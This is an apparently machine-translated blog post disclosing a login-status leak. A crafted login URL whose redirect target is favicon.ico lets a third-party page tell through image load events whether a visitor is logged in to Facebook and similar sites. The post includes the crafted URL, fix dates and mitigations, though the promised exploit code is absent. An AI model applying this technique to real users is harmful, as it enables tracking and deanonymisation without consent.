A website icon triggers the murder! Bypass the same-origin policy to determine if you are logged in to a site
Objective
I would like to tell you that, without your consent, most major web platforms today will leak your login status. Whether or not you are currently logged in, an attacker can detect that your computer is logged on to those web platforms. And there are many platforms available to provide services such as demographics and personality analysis, so attackers can also speculate on your character traits.
Demo site: "Point me to visit"
Technical analysis
For the vast majority of platforms, they can use the login mechanism to detect whether a user is logged on to their own network service. Although this loophole has been around for years and is a well-known loophole, most companies do not seem to be trying to fix it at the moment.
It is important to note that the exploit of this vulnerability is very simple, and that it is easy to fix the vulnerability. Next, I'll take facebook.com as an example to show you how this technique works.
How does the login redirection mechanism work?
First, we want to understand what a login redirection mechanism is. Assume that you are logged in and are accessing the Https://www.facebook.com/bookmarks/pages page.
Now, to access this URL address in a separate page tab, you are not logged in on this tab, so you will be redirected to the login page of the website service by this URL address:
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fbookmarks%2Fpages
Note the next parameter in the URL address above, the value of this parameter is as follows:
https%3A%2F%2Fwww.facebook.com%2Fbookmarks%2Fpages
We are just jumping from this address in this parameter, and when we have completed the login, the URL above will redirect us to the page we were going to visit.
If we are now logged in, then access this URL address under a new browser page tab (https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com% 2fbookmarks%2fpages), then the browser directs us directly to this page. So we can come to the conclusion that
1. If you are already logged in: The URL will return the address in the next parameter;
2. If you are not logged in: The URL will return to the website service login page;
Bypassing the same Origin policy
What's the use of this URL address? The same-origin policy prevents us from reading the result returned by this request from a domain other than https://facebook.com.
The same-origin policy is very restrictive for HTML pages, but it allows us to receive image resources from other domains. So, if the resource in the next parameter is a picture resource, we can read this part of the data from our own website. Facebook only detects if the value of the next parameter in the URL address starts with https://facebook.com, so we just need to find a picture file on Facebook's website. Is this supposed to be a little difficult? Actually, this is a bit difficult indeed! Because the images in the Facebook site are all hosted in the domain name fbcdn.net. But there is a picture that almost all Web servers will have, that is favicon.ico!
The following is the URL address for the site icon as the next parameter:
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico
This is a very interesting URL address:
1. If you are already logged in: The URL will return to the website icon;
2. If you are not logged in: The URL will return to the website service login page;
We can use this URL address in a tag on our website:
The properties of this tag are as follows:
1. If you are already logged in: You will receive the website icon, the HTML page will automatically load this image resource, and automatically trigger the onload callback event;
2. If you are not logged in: You will receive the login page of the website, the icon resource will fail to load, and automatically trigger the OnError callback event;
The final exploit code is as follows:
Other platforms
This technology applies to the vast majority of current web platforms, as many service providers add redirection parameters to their login addresses, and they also need to host the site's icon resources in their hosts.
Update information
2016/10/07:instagram removed the icon files from the root directory of the Web site and transferred them to their CDN.
2016/10/14:stackoverflow has fixed the problem.
2016/10/14: Firefox seems to have fixed the issue as well. Because when we use the new Firefox browser to access the test page, we receive the error message as shown:
2016/10/14:netflix Fix the problem by redirecting the page to the main page of the site.
The availability of this technology and mitigation solutions
Attackers can also use this technique for de-anonymity techniques, click-hijacking attacks, and phishing attacks. This will result in a greater loss to the user.
Therefore, in order to mitigate the impact of this problem, the first is to disable all third-party cookies. In addition, you can install browser plugins like Privacy Badger and umatrix to protect you from such attacks.
Summary if you find that there are other sites that may be affected by this attack technology, please make them available soon. We have to put pressure on these platforms, and if the problem gets worse and more websites are affected, maybe one day they'll fix it.
A website icon triggers the murder! Bypass the same-origin policy to determine if you are logged in to a site